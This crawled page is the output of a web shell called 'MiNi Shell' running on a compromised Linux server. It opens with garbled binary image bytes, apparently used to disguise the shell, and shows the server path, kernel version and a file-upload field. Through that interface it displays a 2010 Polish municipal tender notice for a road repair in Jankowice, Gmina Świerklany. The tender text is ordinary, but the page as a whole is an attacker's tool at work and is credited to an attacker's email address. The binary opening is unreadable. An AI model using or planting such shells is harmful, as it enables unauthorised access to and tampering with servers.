JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/17678-N-2010.html

<p class="kh_header"><b>Jankowice: Remont drogi gminnej bocznej od ul. Boguszowickiej w miejscowości Jankowice wraz z przebudową pobocza w zakresie nawierzchni i podbudowy</b><br>
<b>Numer ogłoszenia: 17678 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świerklany , ul. Świerklańska 54, 44-264 Jankowice, woj. śląskie, tel. 032 4327500, faks 032 4327509.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swierklany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi gminnej bocznej od ul. Boguszowickiej w miejscowości Jankowice wraz z przebudową pobocza w zakresie nawierzchni i podbudowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie nawierzchni jezdni kostki brukowej betonowej betonitowej,  tj.:
a)	Wyznaczenie trasy i punktów wysokościowych drogi w terenie równinnym - 0,210 km
b)	Wykonanie wykopów ręcznie z poprzecznym przerzutem na nasyp w gruncie kat. IV - 25,100 m3
c)	Wykonanie wykopów mechanicznie w gruncie kat. IV załadowanie i odwiezienie na odkład na odległość do 1 km - 373,800 m3
d)	Dodatek za każdy dalszy rozpoczęty 1 km odległości transportu ponad 1 km, drogi o nawierzchni utwardzonej, kategoria gruntu I-IV, samochód 5-10-t, dodatek 11 km - 373,800 m3
e)	Ręczne formowanie nasypów, grunt kat.-IV pochodzący z wykopu - 25,100 m3
f)	Mechaniczne zagęszczanie nasypów, ubijakami mechanicznymi, grunt spoisty kategorii III-IV - 25,100 m3
g)	Regulacja pionowa studzienek dla urządzeń podziemnych, kratki ściekowe uliczne - 1,000 szt.
h)	Mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne w gruncie kat IV,- 612,000 m2
i)	Mechaniczne oczyszczenie warstw konstrukcyjnych bitumicznych - 398,000 m2
j)	Skropienie warstw konstrukcyjnych emulsją asfaltową kationową szybkorozpadową w ilości 0,4 km/m2 - 398,000 m2
k)	Stabilizacja gruntu rodzimego cementem, grubości 15-cm - 337,200 m2
l)	Dodatek za każdy następny 1 cm grubości stabilizacji podbudowy powyżej 15 cm, dodatek 15 cm - 337,200 m2
m)	Ułożenie podbudowy zasadniczej z kruszywa łamanego 0/31,5 mm, stabilizowanego mechanicznie grubości 15 cm - 279,850 m2
n)	Dodatek za każdy dalszy 1 cm grubości ułożenia podbudowy powyżej 15 cm, dodatek 5 cm - 279,850 m2
o)	Wyrównanie istniejącej podbudowy betonem asfaltowym BA 0/11 mm, stabilizowaną mechanicznie, średnia grubość 4 cm - 20,696 t
p)	Ułożenie nawierzchni jezdni z kostki betonitowej grubości 12 cm na podsypce cementowo - piaskowej grubości 3 cm, koloru szarego - kalkulacja indywidualna - 617,050 m2
q)	Ułożenie geowłókniny z włókien ciągłych, wzmocnionych przez igłowanie, odpornej na wysokie temperatury, wzmocnionej siatką - na połączeniach z istniejącą jezdnią (kalkulacja indywidualna) 10 m2
r)	Ułożenie warstwy ścieralnej z betonu asfaltowego BA 0/11 mm, stabilizowanego mechanicznie, grubości 4 cm - 199,000 m2
s)	Frezowanie nawierzchni asfaltowych na zimno z odwiezieniem kory asfaltowej na place składowe, frezowanie na głębokości 2 cm - 199,000 m2
t)	Ręczne plantowanie (obrobienie na czysto), skarpy, kategoria gruntu IV -1,220 m2
u)	Humusowanie i obsianie skarp, humus grubości 5cm -1,220 m2
v)	Dodatek za każdy następny 1 cm humusu powyżej 5 cm, dodatek 10 cm -1,220 m2
w)	Wykonanie ławy betonowej z oporem z betonu klasy C12/15 pod krawężnik i krawężnik z ściekiem -46,223 m3
x)	Ustawienie krawężników betonowych wibroprasowanych bez ław,20x30cm, podsypka cementowo-piaskowa - 427,146 m
y)	Ułożenie ścieku z kostki brukowej betonowej wibroprasowanej grubości 6cm na ławie betonowej wykonanej łącznie z krawężnikiem, na podsypce cementowo-piaskowej grubości 3 cm, z wypełnieniem spoin zaprawą cementową - kalkulacja indywidualna - 43,514 m2
2.	Szczegółowy opis przedmiotu zamówienia przedstawiony został w załącznikach  do niniejszej SIWZ: dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót, ogólnych warunkach umowy.
3.	Roboty winny zostać wykonane i ukończone zgodnie z prawem obowiązującym 
w Rzeczypospolitej Polskiej, w szczególności: Prawem Budowlanym, Prawem ochrony środowiska, Prawem o ruchu drogowym oraz Ustawą o drogach publicznych, Ustawą 
o odpadach, Ustawą o badaniach i certyfikacji i wymaganiami Zamawiającego, 
a kierowanie i nadzorowanie robót mogą wykonywać osoby, które posiadają wymagane prawem uprawnienia i są ubezpieczone od odpowiedzialności cywilnej. Szczególną uwagę Wykonawcy muszą również zwrócić na warunki dotyczące zatrudniania pracowników na terytorium Rzeczypospolitej Polskiej oraz obowiązek przestrzegania wszystkich przepisów prawnych dotyczących warunków świadczenia pracy dla każdej grupy pracowników.
4.	Wykonawcy ponoszą wyłączną odpowiedzialność za zbadanie z należytą starannością Specyfikacji Istotnych Warunków Zamówienia i każdym Uzupełnieniem do Specyfikacji Istotnych Warunków Zamówienia wydanym podczas postępowania o udzielenie zamówienia. W przypadku, kiedy Wykonawca zostanie wybrany, żadne żądanie o zmianę Ceny Ofertowej nie może zostać wniesione na podstawie błędów lub ominięć w świetle powyższych zobowiązań Wykonawcy.
5.	Uznaje się, iż złożenie ofert oznacza, że Wykonawcy zapoznali się ze wszelkimi odpowiednimi ustawami i innymi przepisami prawnymi obowiązującymi w Rzeczypospolitej Polskiej, które mogą w jakikolwiek sposób wpłynąć na lub dotyczyć działań i czynności objętych ofertą i wynikającą z niej Umową.
6.	Podane w opisie przedmiotu zamówienia nazwy materiałów oraz producentów należy traktować jako przykładowe, dopuszcza się zastosowanie materiałów porównywalnych o nie gorszych parametrach technicznych oraz jakościowych.
7.	Jeżeli Zamawiający w opisie przedmiotu zamówienia wskazał znaki towarowe, patenty lub pochodzenie w związku z specyfiką przedmiotu zamówienia to wskazaniu takiemu towarzyszą wyrazy: lub równoważny.
8.	Wykonawca, który powołuje się na rozwiązania równoważne jest zobowiązany wykazać, że oferowane przez niego urządzenia spełniają wymagania określone przez Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.12.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 5.000,00 zł. (słownie: pięć tysięcy złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości 5.000 zł. (słownie: pięć tysięcy złotych 00/100). 

2.	W postępowaniu mogą wziąć udział Wykonawcy spełniający warunki określone w oparciu o art. 22 ust. 1 ustawy Pzp, dotyczące:
2.1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2.2.	posiadania wiedzy i doświadczenia:
Wykonawca winien zrealizować w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 roboty budowlane odpowiadające swoim rodzajem i wartością robocie budowlanej stanowiącej przedmiot zamówienia (tzn. zrealizować min. 2 zamówienia w zakresie budowy dróg o nawierzchni z kostki brukowej betonowej betonitowej o powierzchni min. 500 m2 - każde zadanie).
Wykonawca winien załączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
2.3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Wykonawca  winien dysponować pracownikami posiadającymi odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania przedmiotu zamówienia, w tym kadrę kierowniczą składającą się z:
a)	kierownika budowy - posiadającego uprawnienia budowlane w specjalności drogowej bez ograniczeń, wydane nie później niż 31.12.2003 r., praktyka zawodowa min. 10 lat;
2.4.	sytuacji ekonomicznej i finansowej:
a)	Wykonawca winien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (ubezpieczenie deliktowe i kontraktowe) zgodnej z przedmiotem zamówienia w wysokości min. 100.000 zł.

3.	W postępowaniu mogą wziąć udział Wykonawcy niepodlegający wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp. 

4.	W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienie, warunki określone w pkt. 3. spełniać musi każdy z Wykonawców, zaś warunki w pkt. 1. i 2.  Wykonawcy spełniać muszą łącznie.

5.	Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie właściwych dokumentów i oświadczeń, na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na potwierdzenie spełniania warunków, Wykonawcy winni przedłożyć nw. dokumenty i oświadczenia:
1.1.	dowód wniesienia wadium;
1.2.	oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp, zgodnie z treścią Załącznika nr 2;
1.3.	oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w zakresie art. 24 ust. 1 ustawy Pzp, zgodnie z treścią Załącznika nr 3;
1.4.	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy;
1.5.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.6.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
1.7.	wykaz wykonanych przez Wykonawcę robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, zgodnie z treścią Załącznika nr 4 wraz z załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
1.8.	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresem wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z treścią Załącznika nr 5;
1.9.	zobowiązanie w trybie art. 26 ust. 2b ustawy Pzp, zgodnie z treścią Załącznika nr 6 ;
1.10.	oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, zgodnie z treścią Załącznika nr 7;
1.11.	opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (ubezpieczenie deliktowe i kontraktowe)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.swierklany.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świerklany
ul. Świerklańska 54
44 - 264 Jankowice
Referat Inwestycji i Zamówień Publicznych, biuro nr 17 - parter.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2010 godzina 10:00, miejsce: Urząd Gminy Świerklany
ul. Świerklańska 54
44 - 264 Jankowice
sekretariat, biuro nr 21 - I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com